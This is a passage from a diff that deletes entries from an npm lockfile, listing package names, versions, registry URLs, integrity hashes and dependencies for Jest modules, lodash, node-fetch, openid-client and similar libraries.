"sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - } - }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true - }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - }, - "jsbn": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", - "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==" - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "matcher": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/matcher/-/matcher-4.0.0.tgz", - "integrity": "sha512-S6x5wmcDmsDRRU/c2dkccDwQPXoFczc5+HpQ2lON8pnvHlnvHAHj5WlLVvw6n6vNyHuVugYrFohYxbS+pvFpKQ==", - "requires": { - "escape-string-regexp": "^4.0.0" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==" - }, - "minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "requires": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "dependencies": { - "minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - } - } - }, - "mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "mustache": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/mustache/-/mustache-4.2.0.tgz", - "integrity": "sha512-71ippSywq5Yb7/tVYyGbkBggbU8H3u5Rz56fH60jGFgr8uHwxs+aSKeqmluIVzM0m0kB7xQjKS6qPfd0b2ZoqQ==" - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", - "requires": { - "whatwg-url": "^5.0.0" - } - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "optional": true - }, - "oidc-token-hash": { - "version": "5.0.3", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.3.tgz", - "integrity": "sha512-IF4PcGgzAr6XXSff26Sk/+P4KZFJVuHAJZj3wgO3vX2bMdNVp/QXTP3P7CEm9V1IdG8lDLY3HhiqpsE/nOwpPw==", - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "5.4.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.3.tgz", - "integrity": "sha512-sVQOvjsT/sbSfYsQI/9liWQGVZH/Pp3rrtlGEwgk/bbHfrUDZ24DN57lAagIwFtuEu+FM9Ev7r85s8S/yPjimQ==", - 